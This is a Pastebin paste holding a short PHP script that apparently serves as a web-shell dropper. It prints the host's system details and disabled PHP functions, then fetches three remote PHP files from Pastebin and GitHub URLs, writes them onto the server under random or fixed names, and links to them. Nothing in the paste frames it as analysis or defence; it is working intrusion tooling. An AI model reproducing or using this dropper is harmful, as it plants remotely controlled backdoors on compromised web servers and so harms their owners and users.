D3F4ULT8778

Untitled

Sep 24th, 2020
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.25 KB | None | 0 0
  1. <?php
  2. $unix = php_uname();
  3. echo '<center><h1>** Silence is gold **</h1></center>';
  4. echo '<center><h3>disable_functions: ' . ini_get('disable_functions');
  5. echo '<center><h6>'.$unix.'</h6></center>';
  6. $htaccess = "https://pastebin.com/raw/1xZGzW7B";
  7. $file = file_get_contents($htaccess);
  8. $rand = rand(1, 10000);
  9. $open = fopen($rand.".php" , 'w');
  10. fwrite($open,$file);
  11. fclose($open);
  12. if($open) {
  13. echo" <a href=$rand.php><center><b> ==> $rand.php</b></center></a>";
  14.  
  15. } else {
  16. echo "<center><br>[-] Error ./";
  17. }
  18. $cgi = "https://raw.githubusercontent.com/T0TSC4/Stuff784/master/S-P-C.php";
  19. $file = file_get_contents($cgi);
  20. $open = fopen("g2.php" , 'w');
  21. fwrite($open,$file);
  22. fclose($open);
  23. if($open) {
  24. echo "<a href=g2.php><center><b> ==> g2.php</b></center></a>";
  25. } else {
  26. echo "<br>[-] Error ./";
  27. }
  28. $usr = "https://pastebin.com/raw/E8J1Rb9v";
  29. $file = file_get_contents($usr);
  30. $rand2 = rand(1, 10000);
  31. $open = fopen($rand2.".php" , 'w');
  32. fwrite($open,$file);
  33. fclose($open);
  34. if($open) {
  35. echo" <a href=$rand2.php><center><b> ==> $rand2.php</b></center></a>";
  36.  
  37. } else {
  38. echo "<br>[-] Error ./";
  39. }
  40. ?>
Add Comment
Please, Sign In to add comment